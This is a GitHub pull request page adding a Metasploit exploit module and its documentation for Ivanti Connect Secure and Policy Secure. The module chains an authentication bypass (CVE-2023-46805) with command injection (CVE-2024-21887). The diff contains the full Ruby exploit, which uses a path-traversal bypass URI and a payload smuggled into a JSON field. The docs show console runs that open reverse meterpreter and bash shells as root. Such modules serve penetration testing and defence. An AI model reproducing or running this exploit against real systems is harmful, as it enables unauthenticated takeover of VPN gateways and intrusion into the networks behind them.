-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Ivanti Connect Secure RCE exploit module (CVE-2023-46805 and CVE-2024-21887) #18708
Merged
Merged
Changes from 11 commits
Commits
Show all changes
12 commits
Select commit
Hold shift + click to select a range
4060e06
first commit of the ICS exploit
sfewer-r7 ea1dafa
this is a slightly nicer way to write this
sfewer-r7 f9419c4
seperate commands into an array instead of one bog long string
sfewer-r7 ad7e348
remove a copy pasta link
sfewer-r7 518c1e5
mention Pull Connect as well as the CVEs in the description
sfewer-r7 70ef0dc
improve the check logic to fall through when the json doesnt have the…
sfewer-r7 2919b36
add in docs
sfewer-r7 5ba4aba
Update documentation/modules/exploit/linux/http/ivanti_connect_secure…
sfewer-r7 3bb1d2b
Update modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023…
sfewer-r7 c74fd86
Update modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023…
sfewer-r7 4ff3998
By replacing the trailing ';' with a '#' we comment out the remaining…
sfewer-r7 de6ed9e
use get_json_document instead of JSON.parse
sfewer-r7 File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
174 changes: 174 additions & 0 deletions
174
...entation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,174 @@ | ||
## Vulnerable Application | ||
This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection | ||
vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti | ||
Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and | ||
22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are | ||
also vulnerable. | ||
|
||
## Testing | ||
To test we used Ivanti Connect Secure version 22.3R1 (build 1647), deployed as a virtual appliance for HyperV. The | ||
below steps are for HyperV, but it should be very similar to install on VMWare. | ||
|
||
* Signup for a trial to download the file `ps-ics-hyper-v-isa-v-22.3r1.0-b1647-package.zip` | ||
* From this ZIP file, extract the file `ISA-V-HYPERV-ICS-22.3R1-1647.1-VT-hyperv.vhdx` | ||
* Create a new VM in HyperV and specify the VHDX file as the hard drives media. | ||
* Boot the VM and follow the console instructions to install the product. | ||
* After installation completes, you will have created an admin account and password. You can log into the admin | ||
web interface by visiting https://<TARGET_IP_ADDRESS>/admin in your web browser if you want. | ||
|
||
## Verification Steps | ||
1. Start msfconsole | ||
2. `use exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805` | ||
3. `set RHOST <TARGET_IP_ADDRESS>` | ||
4. `set target 0` | ||
5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp` | ||
6. `check` | ||
7. `exploit` | ||
|
||
## Scenarios | ||
To support a broad set of available payloads, we support both a Linux target and a Unix Target. This allows for native | ||
Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell. | ||
|
||
### Linux Target | ||
|
||
``` | ||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set RHOST 192.168.86.111 | ||
RHOST => 192.168.86.111 | ||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set target 0 | ||
target => 0 | ||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp | ||
PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp | ||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > show options | ||
|
||
Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805): | ||
|
||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
Proxies no A proxy chain of format type:host:port[,type:host:port][...] | ||
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html | ||
RPORT 443 yes The target port (TCP) | ||
SSL true no Negotiate SSL/TLS for outgoing connections | ||
VHOST no HTTP server virtual host | ||
|
||
|
||
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp): | ||
|
||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) | ||
FETCH_DELETE false yes Attempt to delete the binary after execution | ||
FETCH_FILENAME DbFmtsbLwkUU no Name to use on remote system when storing payload; cannot contain spaces. | ||
FETCH_SRVHOST no Local IP to use for serving payload | ||
FETCH_SRVPORT 8080 yes Local port to use for serving payload | ||
FETCH_URIPATH no Local URI to use for serving payload | ||
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces. | ||
LHOST 192.168.86.42 yes The listen address (an interface may be specified) | ||
LPORT 4444 yes The listen port | ||
|
||
|
||
Exploit target: | ||
|
||
Id Name | ||
-- ---- | ||
0 Linux Command | ||
|
||
|
||
|
||
View the full module info with the info, or info -d command. | ||
|
||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > check | ||
[+] 192.168.86.111:443 - The target is vulnerable. IVE-OS 22.3R1 (1647) | ||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > exploit | ||
|
||
[*] Started reverse TCP handler on 192.168.86.42:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[+] The target is vulnerable. IVE-OS 22.3R1 (1647) | ||
[*] Sending stage (3045380 bytes) to 192.168.86.111 | ||
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.111:27576) at 2024-01-17 10:16:52 +0000 | ||
|
||
meterpreter > getuid | ||
Server username: root | ||
meterpreter > sysinfo | ||
Computer : 192.168.86.111 | ||
OS : (Linux 4.15.18.34-production) | ||
Architecture : x64 | ||
BuildTuple : x86_64-linux-musl | ||
Meterpreter : x64/linux | ||
meterpreter > cat /home/ssl-vpn-VERSION | ||
export DSREL_MAJOR=22 | ||
export DSREL_MINOR=3 | ||
export DSREL_MAINT=1 | ||
export DSREL_DATAVER=4802 | ||
export DSREL_PRODUCT=ssl-vpn | ||
export DSREL_DEPS=ive | ||
export DSREL_BUILDNUM=1647 | ||
export DSREL_COMMENT="R1" | ||
meterpreter > | ||
``` | ||
|
||
### Unix Target | ||
|
||
``` | ||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set target 1 | ||
target => 1 | ||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > set PAYLOAD cmd/unix/reverse_bash | ||
PAYLOAD => cmd/unix/reverse_bash | ||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > show options | ||
|
||
Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805): | ||
|
||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
Proxies no A proxy chain of format type:host:port[,type:host:port][...] | ||
RHOSTS 192.168.86.111 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html | ||
RPORT 443 yes The target port (TCP) | ||
SSL true no Negotiate SSL/TLS for outgoing connections | ||
VHOST no HTTP server virtual host | ||
|
||
|
||
Payload options (cmd/unix/reverse_bash): | ||
|
||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
LHOST 192.168.86.42 yes The listen address (an interface may be specified) | ||
LPORT 4444 yes The listen port | ||
|
||
|
||
Exploit target: | ||
|
||
Id Name | ||
-- ---- | ||
1 Unix Command | ||
|
||
|
||
|
||
View the full module info with the info, or info -d command. | ||
|
||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > check | ||
[+] 192.168.86.111:443 - The target is vulnerable. IVE-OS 22.3R1 (1647) | ||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > exploit | ||
|
||
[*] Started reverse TCP handler on 192.168.86.42:4444 | ||
[*] Running automatic check ("set AutoCheck false" to disable) | ||
[+] The target is vulnerable. IVE-OS 22.3R1 (1647) | ||
[*] Command shell session 2 opened (192.168.86.42:4444 -> 192.168.86.111:27582) at 2024-01-17 10:19:19 +0000 | ||
|
||
id | ||
uid=0(root) gid=0(root) groups=0(root) | ||
uname -a | ||
Linux localhost2 4.15.18.34-production #1 SMP Fri Jun 17 13:08:47 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux | ||
pwd | ||
/data/var/cores | ||
cat /home/ssl-vpn-VERSION | ||
export DSREL_MAJOR=22 | ||
export DSREL_MINOR=3 | ||
export DSREL_MAINT=1 | ||
export DSREL_DATAVER=4802 | ||
export DSREL_PRODUCT=ssl-vpn | ||
export DSREL_DEPS=ive | ||
export DSREL_BUILDNUM=1647 | ||
export DSREL_COMMENT="R1" | ||
exit | ||
[*] 192.168.86.111 - Command shell session 2 closed. | ||
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2023_46805) > | ||
``` |
123 changes: 123 additions & 0 deletions
123
modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,123 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
prepend Msf::Exploit::Remote::AutoCheck | ||
|
||
def initialize(info = {}) | ||
super( | ||
update_info( | ||
info, | ||
'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution', | ||
'Description' => %q{ | ||
This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection | ||
vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti | ||
Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and | ||
22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are | ||
also vulnerable. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => [ | ||
'sfewer-r7', # MSF Exploit & Rapid7 Analysis | ||
], | ||
'References' => [ | ||
['CVE', '2023-46805'], # The auth bypass vulnerability. | ||
['CVE', '2024-21887'], # The command injection vulnerability. | ||
['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'], | ||
['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/'] | ||
], | ||
'DisclosureDate' => '2024-01-10', | ||
'Platform' => %w[linux unix], | ||
'Arch' => [ARCH_CMD], | ||
'Privileged' => true, # Code execution as root. | ||
'Targets' => [ | ||
[ | ||
# Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads: | ||
# cmd/linux/http/x64/meterpreter/reverse_tcp | ||
# cmd/linux/http/x64/shell/reverse_tcp | ||
# cmd/linux/http/x86/shell/reverse_tcp | ||
'Linux Command', | ||
{ | ||
'Platform' => 'linux', | ||
'Arch' => [ARCH_CMD] | ||
}, | ||
], | ||
[ | ||
# Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads: | ||
# cmd/unix/python/meterpreter/reverse_tcp | ||
# cmd/unix/reverse_bash | ||
# cmd/unix/reverse_python | ||
'Unix Command', | ||
{ | ||
'Platform' => 'unix', | ||
'Arch' => [ARCH_CMD] | ||
}, | ||
] | ||
], | ||
'DefaultOptions' => { | ||
'RPORT' => 443, | ||
'SSL' => true, | ||
'FETCH_WRITABLE_DIR' => '/tmp' | ||
}, | ||
'DefaultTarget' => 0, | ||
'Notes' => { | ||
'Stability' => [CRASH_SAFE], | ||
'Reliability' => [REPEATABLE_SESSION], | ||
'SideEffects' => [IOC_IN_LOGS] | ||
} | ||
) | ||
) | ||
end | ||
|
||
def check | ||
# We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve | ||
# the target system version information. If this requests succeeds, the target is vulnerable. | ||
res = send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => '/api/v1/totp/user-backup-code/../../system/system-information' | ||
) | ||
|
||
return CheckCode::Unknown('Connection failed') unless res | ||
|
||
# If the vendor mitigation has been applied, the request will return 403 Forbidden. | ||
return CheckCode::Safe if res.code != 200 | ||
|
||
# By here we know the target is vulnerable, we can pull out the exact version information from the response, this | ||
# is only for display purposes, we don't need to test the version information. | ||
|
||
begin | ||
json_data = JSON.parse(res.body) | ||
|
||
name = json_data.dig('software-inventory', 'software', 'name') | ||
version = json_data.dig('software-inventory', 'software', 'version') | ||
build = json_data.dig('software-inventory', 'software', 'build') | ||
|
||
return Exploit::CheckCode::Vulnerable("#{name} #{version} (#{build})") unless name.nil? || version.nil? || build.nil? | ||
rescue JSON::ParserError | ||
return CheckCode::Unknown('Failed to parse JSON data') | ||
end | ||
|
||
# Fall through to here if we got a JSON response but it didn't contain the expected keys. | ||
CheckCode::Unknown('No version information in response') | ||
end | ||
|
||
def exploit | ||
send_request_cgi( | ||
'method' => 'POST', | ||
'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection', | ||
'ctype' => 'application/json', | ||
'data' => { | ||
'type' => ";#{payload.encoded} #", | ||
'txtGCPProject' => Rex::Text.rand_text_alpha(8), | ||
'txtGCPSecret' => Rex::Text.rand_text_alpha(8), | ||
'txtGCPPath' => Rex::Text.rand_text_alpha(8), | ||
'txtGCPBucket' => Rex::Text.rand_text_alpha(8) | ||
}.to_json | ||
) | ||
end | ||
end |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
get_json_document
may be a better optionThere was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I implemented this suggestion via de6ed9e